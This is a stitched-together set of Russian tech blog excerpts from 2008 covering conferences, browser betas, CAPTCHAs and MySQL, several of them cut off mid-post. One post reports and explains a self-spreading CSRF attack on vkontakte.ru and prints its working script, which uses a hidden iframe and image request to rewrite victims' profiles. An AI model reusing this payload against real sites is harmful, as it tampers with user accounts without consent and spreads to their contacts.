В свете последних событий нарыл такую штуку, решил поделиться с сообществом.
Оригинальная статья на английском, поэтому здесь — только вольный перевод.

Значит так. Что заиметь у себя одновременно и графическую, и звуковую капчу, нужно для начала всё это дело скачать. Потом скопировать себе в удобное место и читать дальше. Кстати, лицензия у этой радости — BSD. Кто понимает, тот выбирает =).

19 марта, 19:00-22:00, встреча Программного комитета РИТ-2008. Пройдет в Экстрополисе (Москва), зал Вестник-1.

Задача членов Программного комитета к этому времени собрать как минимум заявки на доклады (названия тем), как максимум — тезисы докладов. Заявки без тезисов принимаем только от проверенных докладчиков ;-)

Встреча открыта — приходите все желающие, мы можем решить там любые вопросы!

Привет, Хабр! Пообщавшись с Сергеем Якубовским, руководителем проекта «рейтинг студий», удалось выяснить ряд интересных подробностей про планы группы, думаю, это любопытно:

Сергей рассказал, что после окончания рейтинга “TOP-100 ведущих веб-студий Рунета 2008” и публикации его результатов, проект будет трансформирован в отраслевое СМИ.

Студии, прошедшие предварительную регистрацию в рамках проекта, получат возможность публиковать на ресурсе свои новые работы, новости, материалы. Так же на основе зарегистрировавшихся компаний будет создана база профилей студий с расширенной информацией.

Напомним, что этап предварительной регистрации заканчивается 14 марта. На данный момент регистрации прошло около 500 веб-студий.

Группа планирует реализовать в рамках проекта элементы B2B сервисов и позволить потенциальным заказчикам публиковать информацию о тендерах, в том числе с фильтрацией их видимости (например, тендер, доступный только студиям из TOP-100, или только студиям из определенного региона).

Обнаружил забавную атаку на сайт vkontakte.ru.
При переходе на сайт tvoydohod.com, если вы в этот же момент авторизованы на вконтакте, отработает следующий джаваскрипт:

<script>
function doit() {
  var html;
  html = '<img src=http://vkontakte.ru/profileEdit.php?page=contacts&subm=1&website=http://tvoydohod.com>';
  window.frames["frm"].document.body.innerHTML = html;
}
</script>
<iframe name="frm" onload="doit()" width="0" height="0"></iframe>

Как видно, будет запрошена картинка с адресом vkontakte.ru/profileEdit.php?page=contacts&subm=1&website=http://tvoydohod.com, броузер сделает запрос по этому УРЛу, и на анкете в vkontakte ваше поле «Веб-сайт» станет равным tvoydohod.com.
Затем в вашем профайле, ваш друг, который вам доверяет кликнет на этот линк, и изменит профайл себе… И т д.

Этот вид атак называется Cross Site Request Forgery. В вики описаны все противоядия и куча полезной инфы.

Сам по себе CSRF довольно скучен. Но в данном случае забавно то, что каждый заразившийся становится разносчиком CSRF-линка.

Отписал в тех-поддержку, где столкнулся с «Это не баг!», «Не кликайте по подозрительным ссылкам!» и прочим. Надеюсь пользователей они ценят и поправят.
А вам было интересно узнать о таком простом «вирусе», который живет целиком в соц-сети =)

 

Вы пользуетесь Sisoft Sandra или аналогичными программами?
Давайте потратим 15 минут и напишем скелет своей программы аналогичного функционала.

Архитектор последних версий браузера Internet Explorer, один из разработчиков стандарта CSS, легендарный Александр Могилевский, выступит с докладом на конференции «РИТ — 2008»!

В течение часового выступления гостя российским веб-разработчикам представится уникальная возможность увидеть новейшие возможности обозревателя Microsoft Internet Explorer 8, который был представлен пару дней назад на конференции MIX'08 в Лас-Вегасе.

Это будет первая презентация новой версии самого популярного браузера в России. Также у вас появится возможность задать любые вопросы человеку, который знает, какими инструментами для работы в интернете мы будем пользоваться в будущем.

В комментариях к этому посту можно задать вопросы Алексу, лучшие из которых я обещаю задать во время интервью.

Для тех, кто не помнит, UA Web — это конференция посвященная веб-разработке. Мы рассчитываем собрать лучших украинских профессионалов в этой сфере вместе и познакомить друг с другом. В программе конференции такие темы как серверное программирование, клиентское программирование, базы данных, инвестиции, аутсорсинг, фриланс, методики разработки и всё, всё, всё.

Все доклады разбиты на три секции:
+ Клиент («JavaScript и доступность web-приложений», «Вёрстка независимыми блоками», «Микроформаты: здесь и сейчас», «Профессиональный верстальщик. Кто он?», «С ножом против паровоза. Нарезка и оптимизация графики для вёрстки», «SilverLight 2.0: первое знакомство», «Комфортная разработка сайтов на XSL»);

+ Серверное программирование и базы данных («Веб-разработка на django», «Многоязычные сайты», «Репликация данных в PostgreSQL», «Рейтинг Bigmir.net, архитектура, перспективы»). Также в этой секции Вы сможете задать свои вопросы разработчику веб-сервера nginx Игорю Сысоеву;

+ Бизнес, фриланс («Социальные сети, перспективы развития и способы монетизации», «Тестирование и оценка времени», «Как стать успешным фрилансером», «Привлечение капитала в Start-Up», «Управление проектами: требования, планирование, контроль», «Зарплаты ИТ-специалистов: анализ developers.org.ua», «Бизнес процессы в веб-разработке»);

Полная программа доступна на сайте конференции:
uaweb.in.ua/news/3971.html

UA Web-2008 состоится 27-28 марта в центре Киева. Дополнительная информация — на сайте проекта:
uaweb.in.ua

Первая украинская конференция веб-разработчиков. Будьмо!

Вышла 4-ая beta браузера Firefox, в ней содержится более 900 исправлений и добавлений. Поменялся менеджер загрузок, а еще теперь можно увеличивать веб-странички (как в опере). Финальный релиз обещали в марте-апреле сего года.

Если кто-то не догадался, речь идет о бете к 3ей версии популярного браузера.

Бонусные ссылки от BmW:
www.opennet.ru/opennews/art.shtml?num=14667
www.mozilla.com/en-US/firefox/3.0b4/releasenotes
developer.mozilla.org/devnews/index.php/2008/03/10/firefox-3-beta-4-now-available-for-download
mozillalinks.org/wp/2008/03/firefox-3-beta-4-review

Наткнулась намедни на статью Игоря Сухинина по поводу стоимости веб-разработок. И аж несколько дней затронутая автором тема прыгала, скакала и корчила рожи, не давая о себе забыть. И все это ради того, чтобы я наконец-то вспомнила про уже запылившийся на полке диск.

На диске одна питерская компания (кому-то, наверняка, знакомая — Юмисофт) делится соображениями по поводу настоящего и будущего рынка сайтостроения. Покатавшись по городам и весям, ребята ужаснулись: в регионах веб-разработка в полной… упадке. Почесали репу и решили разобраться, что к чему и почём.

Итак, здесь я расскажу только о самых значимых, на мой взгляд, моментах исследования и отвечу на обозначенный в теме вопрос. Буду рада, если и вы поделитесь своими соображениями.

15 марта 2008 года в Киеве состоится седьмая всеукраинская конференция по динамическим языкам программирования “Exception Conference #07”. В конференции примут участие лучше украинские и российские специалисты в области разработки GUI- и Web- приложений. Это первая в своём роде конференция, которая «под одной крышей» объединит языки программирования Python, Ruby, SmallTalk, Groovy и REBOL. Аналогов Exception Conference на данный момент нет нигде.

Докладчики конференции являются представителями таких крупных компаний как Epam Systems, Microsoft, российской телекомпании "Спорт". Люди, принимающие непосредственное участие в разработке проектов ВКонтакте.ру, ВКадре.ру, а так же один из авторов известного печатного журнала «Системный Администратор». Кроме того, некоторые из докладчиков являются фрилансерами, имеют богатый опыт удалённой работы и готовы им поделиться.

В программе конференции будут работать два потока докладов, разделённых тематически. Это позволит участникам выбирать наиболее интересные темы. Конференция пройдёт в гостинице «Русь», которая славится своими уютными конференц-залами и качеством обслуживания. В работе конференции задействованы два зала: на 250 и 150 человек. Общее количество ожидаемых участников — 400 человек.

На данный момент известно, что на конференцию едут люди практически со всех уголков Украины (Харьков, Львов, Севастополь, Симферополь, Одесса, Чернигов, Днепропетровск, Донецк, Ивано-Франковск, Ровно, Херсон, Житомир и другие), а так же России (Москва, Санкт-Петербург, Екатеринбург), Беларуссии (Минск, Гомель) и Молдовы (Кишинёв).

Плюс ко всему вышеперечисленному, во время конференции у вас есть реальный шанс получить в подарок один из следующих призов: MP3 плеер Apple iPod Nano 8GB, мобильный телефон LG KG245 или Transcend 8GB JetFlash.

Подробная информация: exception.org.ua/events/exception-conference-07

Если вы занимаетесь разработкой интерфейсов, то наверняка сталкивались с необходимостью разместить на страницах вашего проекта график или диаграмму того или иного содержания и вида: в одном случае это мог быть график суточного отсева спам-сообщений, в другом – “живая” диаграмма, отображающая количество комментариев к вашей статье.

Вот в процессе серфинга попалась замечательная и удобная штука. В схематичном виде представляет

Вступление

Я не являюсь большим поклонником Internet Explorer, однако новая функциональность тестового билда вышедшего позавчера IE8, меня заинтересовала.
Честно говоря, изначально я решил, что это нечто вроде возможности добавления куска страницы в дешборд из Сафари. Однако, потыкав мышкой по странице, я понял, что дело совсем в другом.
Я думаю, что те, кому надо, уже знают об этой возможности давно, ну, а тем кому интересно, прошу почитать эту краткую заметку.

Jan Odvárko написал отличное расширения для Firebug.

Сегодня очень долго выяснял причину, почему после того как я делаю MySQL запрос, в котором обращаюсь к хранимой процедуре (stored procedure) (PHP 5, MySQL 5, mysqli driver)

CALL procedureName()

то следующий за ним запрос не выполняется, а mysqli_error возвращает ошибку

Это повод отпраздновать.

CSS 2.1, улучшенная поддержка стандартов, ускоренный рендеринг JavaScript и другое можно будет попробовать уже в течение часа.
На MIX'08 представляют IE8.
Итак, в течение часа IE8b1 будет доступен тут.

UPD: Уже качаем тут)

О главном: Acid 3 — 17/100

По словам википедии, CAPTCHA — компьютерный тест, используемый для того, чтобы определить, кем является пользователь системы: человеком или компьютером. Основная идея теста: предложить пользователю такую задачу, которую легко решает человек, но которую невозможно (или крайне трудно) научить решать компьютер.
Правда, иногда даже человеку сложно разобраться, что изображено на картинке, либо решить задачу.
Итак, десятка худших:

Впервые довелось увидеть ее неделю назад, но ее очень быстро убрали. Мы страшно расстроились — никто не догадался сделать скриншот.
Но вот ее вернули:

Спешите опробовать (там в самом низу) это чудо пока его снова не убрали! Убрать не убрали, но шрифт сменили (.
P.S. Мне ссылку кинул dimad, за что ему большое спасибо.